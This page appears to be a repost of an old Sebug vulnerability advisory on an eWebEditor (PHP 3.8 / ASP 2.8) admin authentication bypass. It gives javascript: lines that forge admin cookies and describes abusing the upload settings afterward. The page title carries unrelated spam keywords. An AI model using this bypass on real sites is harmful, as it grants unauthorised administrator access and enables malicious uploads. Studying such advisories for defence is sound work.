狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

ewebeditor php&asp版本后臺跳過認證漏洞-適用于asp2.8 PHP3.8

admin
2010年8月13日 10:20 本文熱度 4777

SSV ID:19010

SEBUG-Appdir:eWebEditor

發布時間:2009-12-12

影響版本:

php v3.8
asp v2.8

漏洞描述:

eWebEditor是一個所見即所得的在線編輯器。顧名思義,就是能在網絡上使用所見即所得的編輯方式進行編輯圖文并茂的文章、新聞、討論貼、通告、記事等多種文字處理應用。
../ewebeditor/admin/config.php文件
用戶認證方式存在嚴重的安全漏洞,可以直接跳過認證獲取到管理員權限。


測試方法:

[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
首先當然要找到登陸后臺,默認是../eWebEditor/admin/login.php,進入后臺后隨便輸入一個用戶和密碼,當然會提示出錯了.
這時候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經過驗證才能瀏覽的文件如../ewebeditor/admin /default.php
哈哈,直接進去了,利用和asp一樣,新增樣式修改上傳,就ok了

SEBUG安全建議:

暫無
請參考官方補丁

// sebug.net [2010-01-27]

該文章在 2010/8/13 10:20:56 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved